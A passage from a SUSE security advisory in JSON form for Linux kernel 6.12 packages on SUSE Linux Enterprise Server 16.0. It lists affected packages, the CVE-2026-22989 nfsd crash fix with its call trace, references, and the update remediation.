"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2026-22988"
},
{
"cve": "CVE-2026-22989",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22989"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnfsd: check that server is running in unlock_filesystem\n\nIf we are trying to unlock the filesystem via an administrative\ninterface and nfsd isn\u0027t running, it crashes the server. This\nhappens currently because nfsd4_revoke_states() access state\nstructures (eg., conf_id_hashtbl) that has been freed as a part\nof the server shutdown.\n\n[ 59.465072] Call trace:\n[ 59.465308] nfsd4_revoke_states+0x1b4/0x898 [nfsd] (P)\n[ 59.465830] write_unlock_fs+0x258/0x440 [nfsd]\n[ 59.466278] nfsctl_transaction_write+0xb0/0x120 [nfsd]\n[ 59.466780] vfs_write+0x1f0/0x938\n[ 59.467088] ksys_write+0xfc/0x1f8\n[ 59.467395] __arm64_sys_write+0x74/0xb8\n[ 59.467746] invoke_syscall.constprop.0+0xdc/0x1e8\n[ 59.468177] do_el0_svc+0x154/0x1d8\n[ 59.468489] el0_svc+0x40/0xe0\n[ 59.468767] el0t_64_sync_handler+0xa0/0xe8\n[ 59.469138] el0t_64_sync+0x1ac/0x1b0\n\nEnsure this can\u0027t happen by taking the nfsd_mutex and checking that\nthe server is still up, and then holding the mutex across the call to\nnfsd4_revoke_states().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22989",
"url": "https://www.suse.com/security/cve/CVE-2026-22989"
},
{
"category": "external",
"summary": "SUSE Bug 1257279 for CVE-2026-22989",
"url": "https://bugzilla.suse.com/1257279"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
